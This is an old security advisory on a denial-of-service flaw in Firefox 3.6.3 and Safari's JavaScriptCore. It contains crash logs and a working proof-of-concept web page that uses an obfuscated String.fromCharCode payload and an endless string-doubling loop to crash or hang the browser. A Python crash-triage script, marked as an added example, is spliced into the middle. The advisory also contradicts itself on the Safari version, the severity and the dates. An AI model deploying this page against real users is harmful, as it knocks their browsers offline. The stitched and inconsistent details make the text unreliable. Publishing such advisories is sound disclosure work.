
Firefox 3.6.3 & Safari 4.0.5 - Denial of Service Vulnerability

Firefox 3.6.3 & Safari 4.0.5 Denial of Service Vulnerability on string to char conver

Document Title:
===============
Firefox 3.6.3 & Safari 4.0.5 - Denial of Service Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=186


Release Date:
=============
2011-06-16


Vulnerability Laboratory ID (VL-ID):
====================================
186


Common Vulnerability Scoring System:
====================================
3


Product & Service Introduction:
===============================
Safari is a browser, a platform, and an open invitation to innovate. Whether on a Mac, a PC, an iPhone or an iPod touch, 
Safari pushes the limits of what the Internet can do and delivers a first-class user experience. Safari 4 is available in English.

(Copy of the Vendor Homepage: http://www.apple.com)


With security, stability, speed and much more, Firefox is made for the way you use the Internet. 
Mozilla Firefox is one of the most famous & most widely used web browsers on the Internet.

(Copy of the Vendor Homepage: http://www.mozilla.com)


Abstract Advisory Information:
==============================
The Vulnerability-Lab Team discovered a remote denial of service vulnerability in the Safari v4.0.5 & Mozilla Firefox 3.6.3 browsers.
The remote denial of service vulnerability can lead to different unhandled application crashes & .dll error exceptions.


Vulnerability Disclosure Timeline:
==================================
2011-06-18:	Public Disclosure


Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Remote


Severity Level:
===============
Low


Technical Details & Description:
================================
A denial of service vulnerability is detected in Safari 5.0.4. The vulnerability allows an attacker to craft special 
links that crash the browser remotely. The problem is a string-to-char conversion in the JavaScriptCore.dll 
of Apple's Safari browser. The victim needs to open a manipulated file via a URL request for exploitation. Works on iPhone, 
iPad & the standard MacOS or iOS systems with the browser.

Vulnerable Module(s): 

			[+] JavaScriptCore.dll


--- Exception & Error Logs ---

Version=1
EventType=APPCRASH
EventTime=129185239482901809
ReportType=2
Consent=1
UploadTime=129185239485841977
ReportIdentifier=b33c3844-613d-11df-ae0c-cc0b09ad14de
IntegratorReportIdentifier=b33c3843-613d-11df-ae0c-cc0b09ad14de
WOW64=1
Response.BucketId=1754424409
Response.BucketTable=1
Response.type=4
Sig[0].Name=Anwendungsname
Sig[0].Value=Safari.exe
Sig[1].Name=Anwendungsversion
Sig[1].Value=5.31.22.7
Sig[2].Name=Anwendungszeitstempel
Sig[2].Value=4b8f94fa
Sig[3].Name=Fehlermodulname
Sig[3].Value=JavaScriptCore.dll
Sig[4].Name=Fehlermodulversion
Sig[4].Value=5.31.22.5
Sig[5].Name=Fehlermodulzeitstempel
Sig[5].Value=4b8cb88c
Sig[6].Name=Ausnahmecode
Sig[6].Value=c0000005
Sig[7].Name=Ausnahmeoffset
Sig[7].Value=0008b267
DynamicSig[1].Name=Betriebsystemversion
DynamicSig[1].Value=6.1.7600.2.0.0.768.3
DynamicSig[2].Name=Gebietsschema-ID
DynamicSig[2].Value=1031
DynamicSig[22].Name=Zusatzinformation 1
DynamicSig[22].Value=0a9e
DynamicSig[23].Name=Zusatzinformation 2
DynamicSig[23].Value=0a9e372d3b4ad19135b953a78882e789
DynamicSig[24].Name=Zusatzinformation 3
DynamicSig[24].Value=0a9e
DynamicSig[25].Name=Zusatzinformation 4
DynamicSig[25].Value=0a9e372d3b4ad19135b953a78882e789
UI[2]=C://Program Files (x86)//Safari//Safari.exe
UI[3]=Safari funktioniert nicht mehr
UI[4]=Windows kann online nach einer Lösung für das Problem suchen.
UI[5]=Online nach einer Lösung suchen und das Programm schließen
UI[6]=Später online nach einer Lösung suchen und das Programm schließen
UI[7]=Programm schließen
State[0].Key=Transport.DoneStage1
State[0].Value=1
FriendlyEventName=Nicht mehr funktionsfähig
ConsentKey=APPCRASH
AppName=Safari
AppPath=C://Program Files (x86)//Safari//Safari.exe

					
			



After testing with Safari I tried the older Firefox versions ... and works ... 
but not as stable corruption ... just as application hang crash, which is not really important.


--- Crash Signature ---

Add-ons: {972ce4c6-7e08-4474-a285-3208198ce6fd}:3.6.3
BuildID: 20100401080539
CrashTime: 1274047373
EMCheckCompatibility: true
FramePoisonBase: 00000000f0de0000
FramePoisonSize: 65536
InstallTime: 1274047353
ProductName: Firefox
ReleaseChannel: release
StartupTime: 1274047353
Theme: classic/1.0
Throttleable: 1
Vendor: Mozilla
Version: 3.6.3
Diese Meldung enthält Informationen über den Status der Anwendung zum Zeitpunkt des Absturzes.

Add-ons: {CAFEEFAC-0016-0000-0010-ABCDEFFEDCBA}:6.0.10,[email protected]:0.4.5,{e0204bd5-9d31-402b-a99d-a6aa8ffebdca}:1.2.5,[email protected]:2.2.0,[email protected]:0.4.4,{9c51bd27-6ed8-4000-a2bf-36cb95c0c947}:11.0.1,{078fac48-925f-4524-7cfe-85d44b8f4f98}:1.2,{972ce4c6-7e08-4474-a285-3208198ce6fd}:3.6.3
BuildID: 20100401080539
CrashTime: 1274048978
EMCheckCompatibility: true
FramePoisonBase: 00000000f0de0000
FramePoisonSize: 65536
InstallTime: 1271001297
ProductName: Firefox
ReleaseChannel: release
SecondsSinceLastCrash: 18961191
StartupTime: 1274048839
Theme: classic/1.0
Throttleable: 1
URL: file:///C:/Users/Pim%20Campers/Desktop/exploit.html
Vendor: Mozilla
Version: 3.6.3
This report also contains technical information about the state of the application when it crashed.


--- Debug Logs ---

Version=1
EventType=AppHangB1
EventTime=129185060262769200
ReportType=3
Consent=1
UploadTime=129185060287489643
ReportIdentifier=f8d5f75c-6113-11df-aeb8-f058f4e2ccda
IntegratorReportIdentifier=f8d5f75d-6113-11df-aeb8-f058f4e2ccda
WOW64=1
Response.BucketId=1079492713
Response.BucketTable=5
Response.type=4
Sig[0].Name=Anwendungsname
Sig[0].Value=firefox.exe
Sig[1].Name=Anwendungsversion
Sig[1].Value=1.9.2.3743
Sig[2].Name=Anwendungszeitstempel
Sig[2].Value=4bb4be02
Sig[3].Name=Absturzsignatur
Sig[3].Value=d496
Sig[4].Name=Absturztyp
Sig[4].Value=0
DynamicSig[1].Name=Betriebsystemversion
DynamicSig[1].Value=6.1.7600.2.0.0.768.3
DynamicSig[2].Name=Gebietsschema-ID
DynamicSig[2].Value=1031
DynamicSig[22].Name=Zusätzliche Absturzsignatur 1
DynamicSig[22].Value=d496cf6633958b1ae4d8334c2f20f6a8
DynamicSig[23].Name=Zusätzliche Absturzsignatur 2
DynamicSig[23].Value=640f
DynamicSig[24].Name=Zusätzliche Absturzsignatur 3
DynamicSig[24].Value=640fd84d363223b27e9ec50b94061313
DynamicSig[25].Name=Zusätzliche Absturzsignatur 4
DynamicSig[25].Value=d496
DynamicSig[26].Name=Zusätzliche Absturzsignatur 5
DynamicSig[26].Value=d496cf6633958b1ae4d8334c2f20f6a8
DynamicSig[27].Name=Zusätzliche Absturzsignatur 6
DynamicSig[27].Value=640f
DynamicSig[28].Name=Zusätzliche Absturzsignatur 7
DynamicSig[28].Value=640fd84d363223b27e9ec50b94061313
UI[3]=Firefox reagiert nicht
UI[4]=Wenn Sie das Programm schließen, gehen möglicherweise Informationen verloren.
UI[5]=Programm schließen
UI[6]=Programm schließen
UI[7]=Programm schließen
State[0].Key=Transport.DoneStage1
State[0].Value=1
FriendlyEventName=Beendet und geschlossen.
ConsentKey=AppHangXProcB1
AppName=Firefox
AppPath=C://Users//Rem0ve//Desktop//Cuts//Browser//FirefoxPortable//App//Firefox//firefox.exe
ReportDescription=Aufgrund eines Problems kann dieses Programm nicht mehr mit Windows kommunizieren.
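
For triage of the two Windows Error Reporting reports quoted above, an added example (not part of the original advisory): it reads the `Sig[n].Name`/`Sig[n].Value` pairs by label rather than by index, converts the FILETIME `EventTime` to UTC, and names the NTSTATUS exception code. The `LABELS` mapping covers only the German labels that appear in these reports and is an assumption of this example, as are the function names.

```python
import re
from datetime import datetime, timedelta, timezone

# Excerpts of the two reports quoted above (values copied from the advisory).
SAFARI_WER = """\
Version=1
EventType=APPCRASH
EventTime=129185239482901809
Sig[0].Name=Anwendungsname
Sig[0].Value=Safari.exe
Sig[3].Name=Fehlermodulname
Sig[3].Value=JavaScriptCore.dll
Sig[6].Name=Ausnahmecode
Sig[6].Value=c0000005
Sig[7].Name=Ausnahmeoffset
Sig[7].Value=0008b267
"""
FIREFOX_WER = """\
Version=1
EventType=AppHangB1
EventTime=129185060262769200
Sig[0].Name=Anwendungsname
Sig[0].Value=firefox.exe
Sig[3].Name=Absturzsignatur
Sig[3].Value=d496
Sig[4].Name=Absturztyp
Sig[4].Value=0
"""

# Localized (German) signature labels -> neutral keys. Assumption: other
# locales need their own entries; the slot index differs per event type.
LABELS = {
    "Anwendungsname": "app",
    "Fehlermodulname": "fault_module",
    "Ausnahmecode": "exception_code",
    "Ausnahmeoffset": "exception_offset",
    "Absturzsignatur": "hang_signature",
    "Absturztyp": "hang_type",
}
NTSTATUS = {
    0xC0000005: "STATUS_ACCESS_VIOLATION",
    0xC0000017: "STATUS_NO_MEMORY",
    0xC00000FD: "STATUS_STACK_OVERFLOW",
    0xC0000409: "STATUS_STACK_BUFFER_OVERRUN",
}
SIG_KEY = re.compile(r"^(Sig|DynamicSig)\[(\d+)\]\.(Name|Value)$")


def parse_wer(text):
    """Return (flat key/value fields, {signature label: value})."""
    flat, slots = {}, {}
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if not sep:
            continue
        m = SIG_KEY.match(key.strip())
        if m:  # pair up Name and Value that share the same slot
            slots.setdefault((m.group(1), int(m.group(2))), {})[m.group(3)] = value.strip()
        else:
            flat[key.strip()] = value.strip()
    sigs = {s["Name"]: s["Value"] for s in slots.values() if "Name" in s and "Value" in s}
    return flat, sigs


def filetime_to_utc(filetime):
    """EventTime is a Windows FILETIME: 100 ns ticks since 1601-01-01 UTC."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=int(filetime) // 10)


def triage(text):
    """Summarize one report: crash vs. hang, time, faulting module, exception."""
    flat, sigs = parse_wer(text)
    named = {LABELS[k]: v for k, v in sigs.items() if k in LABELS}
    event = flat.get("EventType", "")
    kind = "hang" if event.lower().startswith("apphang") else "crash" if event.upper() == "APPCRASH" else "other"
    code = int(named["exception_code"], 16) if "exception_code" in named else None
    return {
        "kind": kind,
        "time": filetime_to_utc(flat["EventTime"]) if "EventTime" in flat else None,
        "app": named.get("app"),
        "fault_module": named.get("fault_module"),
        "exception": NTSTATUS.get(code, hex(code)) if code is not None else None,
        "offset": int(named["exception_offset"], 16) if "exception_offset" in named else None,
    }


if __name__ == "__main__":
    for report in (SAFARI_WER, FIREFOX_WER):
        print(triage(report))
```

The Safari report resolves to an access violation inside JavaScriptCore.dll, while the Firefox report carries no faulting module or exception code at all, which matches the advisory's distinction between a crash and an application hang.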





Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers with user interaction. For demonstration or reproduction ...



<meta http-equiv="refresh" content="0; URL=poc.html">
<script>
  var AAAAAAAAAAAAAAAA=String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 118, 97, 114, 32, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 
65, 65, 61, 34, 60, 107, 101, 121, 103, 101, 110, 62, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 34, 59, 119, 104, 105, 108, 101, 40, 
49, 41, 123, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 61, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 43, 65, 65, 
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 119, 114, 105, 116, 101, 108, 110, 40, 65, 65, 65, 65, 
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 41, 59, 125, 60, 47, 115, 99, 114, 105, 112, 116, 62);
  while(1){
    AAAAAAAAAAAAAAAA=AAAAAAAAAAAAAAAA+AAAAAAAAAAAAAAAA;
    document.writeln(AAAAAAAAAAAAAAAA);
  }
</script>


Security Risk:
==============
The security risk of the memory corruption vulnerability is estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab [[email protected]] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.


Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact ([email protected] or [email protected]) to get a permission.

    				   	Copyright © 2012 | Vulnerability Laboratory


